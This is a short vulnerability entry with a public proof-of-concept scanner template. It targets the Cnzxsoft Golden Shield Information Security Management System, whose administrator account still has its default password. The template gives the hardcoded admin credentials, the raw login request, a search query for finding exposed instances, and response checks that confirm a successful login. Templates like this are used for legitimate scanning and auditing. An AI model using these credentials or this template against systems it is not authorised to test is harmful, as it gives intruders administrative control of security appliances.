cnzxsoft-default-login: Cnzxsoft System - Default Login

Date: 2025-08-01 | Affected software: Cnzxsoft System | PoC: public

Vulnerability description

Cnzxsoft Golden Shield Information Security Management System has a default weak password.

PoC code [public]

id: cnzxsoft-default-login

info:
  name: Cnzxsoft System - Default Login
  author: SleepingBag945
  severity: high
  description: |
    Cnzxsoft Golden Shield Information Security Management System has a default weak password.
  metadata:
    verified: true
    max-request: 1
    fofa-query: 'title=="中新金盾信息安全管理系统"'
  tags: default-login,cnzxsoft,vuln

http:
  - raw:
      - |
        POST /?q=common/login  HTTP/1.1
        Host: {{Hostname}}
        Cookie: check_code=ptbh
        Content-Type: application/x-www-form-urlencoded

        name={{username}}&password={{password}}&checkcode=ptbh&doLoginSubmit=1

    payloads:
      username:
        - 'admin'
      password:
        - 'zxsoft1234!@#$'
    attack: pitchfork
    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(body,"1") && contains(header,"ZXSOFT_JDIS_USR_NAME=deleted") && !contains(body_1,"userpwd_error")'
        condition: and
# digest: 4a0a00473045022010784025d84e39467a76569e97f6fca7410c1f8b6abb427f29d906bdbc213c55022100a080d36c678fd620cb2bebe89ad9cac287fe025646e5d13c76836d8176a6ae1b:922c64590222798bb761d5b6d8e72950